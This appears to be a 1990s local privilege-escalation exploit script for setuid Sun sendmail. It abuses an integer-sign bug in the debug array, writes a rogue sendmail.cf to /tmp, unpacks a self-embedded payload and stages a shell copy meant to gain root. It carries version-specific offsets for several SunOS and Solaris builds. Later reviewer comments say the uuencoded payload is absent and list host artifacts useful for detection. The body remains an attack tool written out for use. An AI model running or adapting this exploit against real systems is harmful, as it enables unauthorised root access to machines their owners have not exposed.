#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array. As it, it will work with the 8 versions of sun sendmail
# that I have access to. Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE: This is a Sun specific script. Don't expect it to work with
# any non-sun sendmail.
# -MRW (atreus)
#
# usage: smdhole [/path/to/suid/sendmail]
#
# Reviewer notes (historical SunOS/Solaris sendmail, 1990s):
#  - The script expects a uuencoded payload to be appended to this same
#    file (it re-reads itself via $0 below). That payload is NOT present
#    in this listing, so the file as shown is incomplete and the
#    /tmp/fixit step cannot succeed from it.
#  - Host artifacts it leaves or touches, useful for detection/cleanup:
#    /tmp/sendmail.cf, /tmp/fixit, /tmp/mail/, and a mode-666 copy of
#    /bin/sh at /tmp/newsh (the only one not removed at the end).
#  - Process-level indicator: a setuid sendmail invoked with -d and
#    category numbers in the 4294... range (near 2^32).
#
# Select the target binary: default path, or the one given as $1.
# ($1x = x is the old Bourne-shell idiom for "argument is empty".)
if [ $1x = x ]; then
sendmail=/usr/lib/sendmail
else
echo "Trying to abuse $1."
sendmail=$1
fi
# Fingerprint the binary by its file size taken from `ls -l` fields 4-5,
# with every non-digit stripped. Brittle: depends on this platform's
# ls column layout; the size is then matched in the case below.
sm_size=`echo \`ls -l $sendmail\` | cut -d" " -f4,5 | sed "s/[^0-9]//g`
# prefix and suffix for -1 as unsigned integer. Actually, this is
# off by two. you figure out why.
# (suffix is assigned but never referenced anywhere in the lines shown.)
prefix=42949
suffix=67297
# Each known size maps to three debug-array indices n1..n3; two of the
# entries also carry an alternate set n4..n6 tried if the first fails.
case $sm_size in
132064)
n1=${prefix}52864
n2=${prefix}52865
n3=${prefix}52866
echo Patched solaris w/o mx.
;;
134752)
n1=${prefix}1656
n2=${prefix}1657
n3=${prefix}1658
echo Patched solaris sendmail.mx
;;
130860)
n1=${prefix}53016
n2=${prefix}53017
n3=${prefix}53018
echo Un-patched solaris w/o mx.
;;
133548)
n1=${prefix}1808
n2=${prefix}1809
n3=${prefix}1810
echo Un-patched solaris sendmail.mx
;;
139264)
n1=${prefix}49609
n2=${prefix}49610
n3=${prefix}49611
echo Sun 4.1.3 sendmail - could be either of two versions
n4=${prefix}49265
n5=${prefix}49266
n6=${prefix}49267
;;
155648)
n1=${prefix}46953
n2=${prefix}46954
n3=${prefix}46955
echo Sun 4.1.3 sendmail.mx - could be either of two versions
n4=${prefix}46609
n5=${prefix}46610
n6=${prefix}46611
;;
*)
# Unknown size: nothing is attempted; exit 1.
echo "I don't know what version of sendmail $sendmail is."
echo -n "Look for other versions of sendmail[.mx] on the "
echo "system and re-run this as:"
echo " $0 /path/to/another/suid/sendmail"
exit 1
;;
esac
# Write an attacker-controlled sendmail.cf to /tmp. Both the local and
# prog mailers (Mlocal, Mprog) point at /tmp/fixit, and rule set S0
# routes everything to the local mailer. The heredoc is unquoted, so
# each "\$" becomes a literal "$" in the written file.
cat << EOM > /tmp/sendmail.cf
DMether
DRlocalhost
CRlocalhost
CDMailer-Daemon root daemon uucp
DlFrom \$g \$d
Do.:%@!^=/[]
Dq\$g\$?x (\$x)\$.
De\$j nothing
OA./aliases
OF0666
Og1
OL0
Oo
OPPostmaster
OQ.
Os
Ou1
T root daemon uucp
H?F?From: nobody
Mlocal, P=/tmp/fixit, F=flsSDFMmnP, S=10, R=20, A=mail -d \$u
Mprog, P=/tmp/fixit, F=lsDFMeuP, S=10, R=20, A=sh -c \$u
S0
R\$+ \$#local \$:\$1 just rewrite
EOM
# Self-extract: read this script file, strip the marker string, and
# uudecode the embedded block into /tmp/fixit.Z. The uuencoded block is
# not part of this listing (see header note), so this produces nothing.
# Note $0 must be the script path for this to work (not stdin/-c).
cat $0 | sed "s:atreus::" | uudecode
uncompress /tmp/fixit.Z
chmod 755 /tmp/fixit
# Staging: the .cf copy in /tmp/mail, and a world-writable (666, not
# executable) copy of /bin/sh whose later mode is used as the success test.
mkdir /tmp/mail
cp /tmp/sendmail.cf /tmp/mail
cp /bin/sh /tmp/newsh
chmod 666 /tmp/newsh
# First attempt: run the setuid sendmail with three -d category.level
# pairs built from the indices chosen above, feeding it a one-line
# message addressed to the current user. The 116/109/112 levels are
# fixed by the author; their purpose is not explained on this page.
$sendmail -d${n1}.116,${n2}.109,${n3}.112 `whoami` <<EOF
test
EOF
# Success test: /tmp/newsh was created mode 666, so it can only have
# become executable if something else (presumably the /tmp/fixit payload,
# whose contents are not shown) changed its mode.
if [ -x /tmp/newsh ]; then
echo "Had the right offset for sendmail.cf. Here's the result:"
else
echo "Looks like I had the wrong sendmail.cf offset. Fuckers."
# n4 is only set for the two 4.1.3 sizes; for the others there is no retry.
if [ ${n4}x = x ]; then
echo "This version isn't what I thought it was."
echo "Look for other suid sendmails and try this on them."
else
# Second attempt with the alternate index set n4..n6.
echo "I'm taking another stab with a different offset."
$sendmail -d${n4}.116,${n5}.109,${n6}.112 `whoami` <<EOF
test
EOF
echo "Here's the result:"
fi
fi
# Cleanup removes the staging files but deliberately leaves /tmp/newsh
# in place and lists it; its mode shows whether the attempt worked.
rm /tmp/fixit
rm -r /tmp/mail
rm /tmp/sendmail.cf
ls -l /tmp/newsh
# Bare exit: status is that of the preceding ls, not of the attempt.
exit
# www.hack.co.za [2000]#